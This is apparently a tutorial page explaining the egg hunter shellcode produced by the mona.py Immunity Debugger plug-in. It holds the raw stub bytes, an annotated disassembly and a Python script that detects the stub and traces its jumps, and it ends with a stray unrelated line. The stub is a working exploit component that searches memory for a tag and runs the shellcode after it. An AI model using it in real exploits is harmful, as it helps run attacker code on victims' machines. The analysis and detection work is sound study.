Mona is a plug-in for Immunity Debugger. It offers powerful functions that help exploit developers quickly locate the instruction sequences they need, along with many useful memory-search functions. It can also generate egg hunter code; the default output looks like this:
=====================================================================================================================
Output generated by mona.py v1.1
Corelan Team - http://www.corelan.be
=====================================================================================================================
OS: xp, release 5.1.2600
Process being debugged: php (pid 15016)
=====================================================================================================================
22:20:41
=====================================================================================================================
Egghunter, tag w00t:
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Put this tag in front of your shellcode: w00tw00t
After stepping through this instruction sequence in OllyDbg (OD), it can be annotated as follows:
00406030  66:81CA FF0F   or dx, 0FFF              ; generate the initial EDX value (low 12 bits set to 0xFFF, so the next inc edx lands on the first byte of the next 4 KB page)
00406035  42             inc edx                  ; advance EDX to the next address (loop entry)
00406036  52             push edx                 ; save EDX on the stack
00406037  6A 02          push 2                   ;
00406039  58             pop eax                  ; EAX = 2, the system call number
0040603A  CD 2E          int 2E                   ; issue the system call
0040603C  3C 05          cmp al, 5                ; compare the low byte of the result with 5; if the memory at EDX is not writable, EAX = C0000005 or C00000C5
0040603E  5A             pop edx                  ; restore the EDX value
0040603F  ^ 74 EF        je short shellcod.00406030 ; if [EDX] cannot be written, jump back to 00406030 and move on to the next page
00406041  B8 77303074    mov eax, 74303077        ; load the tag: bytes 77 30 30 74 are "w00t" in little-endian order
00406046  8BFA           mov edi, edx             ; EDI = address to test
00406048  AF             scas dword ptr es:[edi]  ; compare the dword at EDI with EAX (EDI is advanced by 4 after SCAS)
00406049  ^ 75 EA        jnz short shellcod.00406035 ; no match, try the next address
0040604B  AF             scas dword ptr es:[edi]  ; compare the following dword with EAX as well (EDI is advanced by 4 again)
0040604C  ^ 75 E7        jnz short shellcod.00406035 ; no match, try the next address
0040604E  FFE7           jmp edi                  ; egg found: jump to the code that follows the doubled tag and execute it
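The listing above is the kind of stub an analyst will meet in a memory dump or a captured payload. The following Python script is an added example (not from the page's author, not part of mona) that works only with the bytes printed above: it decodes mona's escaped string, matches the fixed opcode bytes of this stub as a detection signature while treating the 4-byte tag in `mov eax, imm32` as a wildcard, resolves the three short jumps to confirm the targets annotated in the listing, and locates the doubled tag ("w00tw00t") in a buffer the same way the two consecutive SCAS instructions do. The sample buffers are constructed; offsets within the stub (0x0F, 0x19, 0x1C) and the load address 0x00406030 are taken from the listing.

```python
import re
import struct

# The egg hunter exactly as mona printed it (tag "w00t"), copied from the listing above.
EGGHUNTER_ESCAPED = (
    r"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    r"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Detection signature: opcode bytes before and after the 4-byte tag operand of
# `mov eax, imm32` (B8 <tag>). Everything except the tag is fixed in this stub.
SIG_BEFORE_TAG = bytes.fromhex("6681caff0f42526a0258cd2e3c055a74efb8")
SIG_AFTER_TAG = bytes.fromhex("8bfaaf75eaaf75e7ffe7")


def unescape(escaped: str) -> bytes:
    """Turn a "\\x66\\x81..." string (as mona prints it) into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", escaped))


def find_egghunters(buf: bytes) -> list:
    """Return (offset, tag) for every egg hunter stub of this shape found in buf.

    The tag is not part of the signature, so stubs generated with any tag match.
    """
    hits = []
    start = 0
    while True:
        i = buf.find(SIG_BEFORE_TAG, start)
        if i < 0:
            break
        tag_at = i + len(SIG_BEFORE_TAG)
        after = buf[tag_at + 4 : tag_at + 4 + len(SIG_AFTER_TAG)]
        if after == SIG_AFTER_TAG:
            hits.append((i, buf[tag_at : tag_at + 4]))
        start = i + 1
    return hits


def short_jump_target(code: bytes, base: int, insn_off: int) -> int:
    """Resolve a 2-byte short jcc (opcode, rel8) at insn_off when code is loaded at base.

    The destination is the address of the next instruction plus the signed rel8.
    """
    rel8 = struct.unpack_from("<b", code, insn_off + 1)[0]
    return base + insn_off + 2 + rel8


def find_egg(memory: bytes, tag: bytes) -> int:
    """Mimic the two SCAS compares: return the offset just past the doubled tag, or -1.

    The hunter jumps to EDI after two matching dwords, i.e. to the byte following
    tag+tag, which is where the payload is expected to start.
    """
    i = memory.find(tag + tag)
    return -1 if i < 0 else i + 2 * len(tag)


if __name__ == "__main__":
    hunter = unescape(EGGHUNTER_ESCAPED)
    base = 0x00406030  # load address shown in the OllyDbg listing
    # Constructed sample: junk, the stub, more junk.
    sample = b"A" * 16 + hunter + b"B" * 16
    for off, tag in find_egghunters(sample):
        print(f"egg hunter stub at offset {off}, tag {tag!r}")
    for insn_off in (0x0F, 0x19, 0x1C):  # je, jnz, jnz within the stub
        print(f"jump at {base + insn_off:08X} -> {short_jump_target(hunter, base, insn_off):08X}")
    # Constructed memory image: filler, the doubled tag, then the code the hunter would run.
    image = b"\x00" * 100 + b"w00tw00t" + b"\xcc" * 8
    print("payload would start at offset", find_egg(image, b"w00t"))
```

The signature deliberately leaves the tag bytes out, so a stub regenerated with a different tag still matches; the jump resolution is what lets you confirm, without a debugger, that `je` returns to the `or dx, 0FFF` page-skip and both `jnz` instructions return to `inc edx`.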
From painful beliefs